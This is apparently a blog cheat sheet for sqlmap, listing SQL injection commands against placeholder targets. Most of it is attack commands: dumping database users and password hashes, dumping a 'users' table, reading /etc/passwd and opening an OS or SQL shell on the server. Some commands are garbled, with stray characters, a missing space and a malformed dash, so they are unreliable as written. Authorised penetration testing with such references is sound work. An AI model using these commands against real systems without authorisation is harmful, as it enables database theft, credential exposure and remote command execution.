Home Sqlmap Cheatsheet
Post
Cancel

Sqlmap Cheatsheet

Burp + sqlmap

Save a request in burp (right click > save to file)

Run with sqlmap

1
sqlmap -r sqlmap.txt --batch

Generic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-u "<URL>" 
-p "<PARAM TO TEST>" 
--user-agent=SQLMAP 
--random-agent 
--threads=10 
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>" 
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Internals

1
2
3
4
5
6
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

Reafile

1
--file-read=/etc/passwd

Specify param to exploit

1
sqlmap -u "http://target_server/param1=value1&param2=value2" -p param1

Use POST requests

1
sqlmap -u "http://target_server" --data=param1=value1&param2=value2

Access with authenticated session

1
sqlmap -u "http://target_server" --data=param1=value1&param2=value2 -p param1 cookie='my_cookie_value'

Basic authentication

1
sqlmap -u !http://target_server! -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password

Evaluating response strings

1
2
3
sqlmap -u "http://target_server/" --string="This string if query is TRUE"

sqlmap -u "http://target_server/" --not-string="This string if query is FALSE"

List all databases at the site

1
sqlmap -u "http://testsite.com/login.php" --dbs

List all tables in a specific database

1
sqlmap -u "http://testsite.com/login.php" -D site_db --tables

List all columns in a table

1
sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns

Dump the contents of a DB table

1
sqlmap -u "http://testsite.com/login.php" -D site_db -T users –dump

Shell

Get OS Shell

1
--os-shell

Get SQL Shell

1
--sql-shell
This post is licensed under CC BY 4.0 by the author.